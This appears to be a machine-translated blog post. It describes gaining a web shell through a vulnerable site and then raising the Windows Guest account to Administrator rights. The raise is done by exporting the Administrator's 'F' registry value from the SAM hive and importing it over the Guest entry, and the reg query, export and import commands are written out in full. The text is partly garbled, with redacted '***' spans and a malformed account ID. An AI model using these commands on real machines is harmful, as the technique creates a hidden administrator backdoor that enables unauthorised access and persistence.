Shulou(Shulou.com)06/01 Report--

When installing MS17-010 patch on Server 2008R2 in the middle of the night, restart the system and find that the system password has been forgotten

Fortunately, the security policy of local login leaves a guest user

DVWA WEB*** Test environment permissions are system

A word from a dog uploaded through a loophole ***

*** Permission is system permission

You can create users, but you can't add users to the admin group. I think it's a security dog. It intercepted the privilege operation.

Then clone administrator privileges to login user login successfully

Target will elevate Guest to Administrator

Query what configuration files exist under SAM registry

Reg query HKLM\SAM\SAM\Domains\Account\Users

User name

Reg query HKLM\SAM\SAM\Domains\Account\Users\Names

000001F4 's profile corresponds to Administrator

00001 F5 's profile corresponds to Guest

Then export the key under the registry

First save Administrator's key value to C drive named 1.reg

Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1.reg

Then save the Guest key value to the C drive named 2.reg

Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F5 c:\2.reg

Then copy the key data of 1.reg "F" and replace the key data of "F" in 2.reg

Then import 2.reg into the registry

Reg import c:\2.reg

Finally use guest login

The user's home directory and so on have become Administrator data

Administrator=Guest

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.